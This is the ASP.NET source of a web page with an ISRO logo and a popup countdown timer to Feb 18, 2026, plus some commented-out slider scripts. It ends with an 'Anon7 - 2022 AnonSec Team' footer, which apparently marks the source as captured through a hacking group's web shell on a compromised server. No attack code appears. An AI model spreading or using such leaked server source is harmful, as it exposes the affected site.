<img loading="lazy" src="Includes/images/logos/2000px-Indian_Space_Research_Organisation_Logo.svg.webp" alt="Logo7" title="Logo7" width="130" height="45" /></a></div>
</section>
</marquee>
<!-- Latest News-->
<!-- <asp:Literal ID="ltNews" runat="server"></asp:Literal>  -->
	
<div class="modal fade" id="landingPopup1" tabindex="-1" aria-hidden="true">
    <div class="modal-dialog modal-dialog-centered modal-custom-size">
        <div class="modal-content popup-bg text-white position-relative">

            <!-- Close Button -->
            <button type="button" data-dismiss="modal" aria-label="Close" class="popup-close-btn">
                <img src="mclose.png" alt="Close">
            </button>

            <!-- Modal Body -->
           <div class="modal-body d-flex justify-content-center align-items-center" style="min-height: 420px;">
            <%--<div style="background-color: rgba(255, 255, 255, 0.6); padding: 1px; border-radius: 10px; text-align: center; color: black; ">--%>
                        <div class="timer-container">
                            <div class="time-box">
                                <h2 id="days">0</h2>
                                <small>Days</small>    </div>
                            <div class="time-box">
                                <h2 id="hours">0</h2>
                                <small>Hours</small>    </div>
                            <div class="time-box">
                                <h2 id="minutes">0</h2>
                                <small>Mins</small>    </div>
                            <div class="time-box">
                                <h2 id="seconds">0</h2>
                                <small>Secs</small>    </div>
                        </div>
                    <%--</div>--%>
               </div>
        </div>
    </div>
	</div>	
	
</asp:Content>
<asp:Content ID="Content3" ContentPlaceHolderID="footer" runat="server">
	<script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.0.0-beta.3/owl.carousel.min.js"></script>
	<script>
        window.addEventListener('load', function () {
          
          //  $("#landingPopup1").modal("show");

        });
	</script>
	<script>
  //var swiper = new Swiper('.swiper-container', {
  //  loop: true,
  //  autoplay: {
  //    delay: 5000,
  //    disableOnInteraction: false,
  //  },
  //  navigation: {
  //    nextEl: '#swiper-next',
  //    prevEl: '#swiper-prev',
  //  },
  //  effect: 'slide', // or your custom 'interLeaveEffect'
  //});
	</script>
	
	<script>
        // Set target date here
        var targetDate = new Date("Feb 18, 2026 00:00:00").getTime();

        function updateTimer() {
            var now = new Date().getTime();
            var diff = targetDate - now;

            if (diff < 0) diff = 0;

            var days = Math.floor(diff / (1000 * 60 * 60 * 24));
            var hours = Math.floor((diff % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
            var minutes = Math.floor((diff % (1000 * 60 * 60)) / (1000 * 60));
            var seconds = Math.floor((diff % (1000 * 60)) / 1000);

            document.getElementById("days").innerHTML = days;
            document.getElementById("hours").innerHTML = hours;
            document.getElementById("minutes").innerHTML = minutes;
            document.getElementById("seconds").innerHTML = seconds;
        }

        setInterval(updateTimer, 1000);
	</script>
</asp:Content>

Anon7 - 2022
AnonSec Team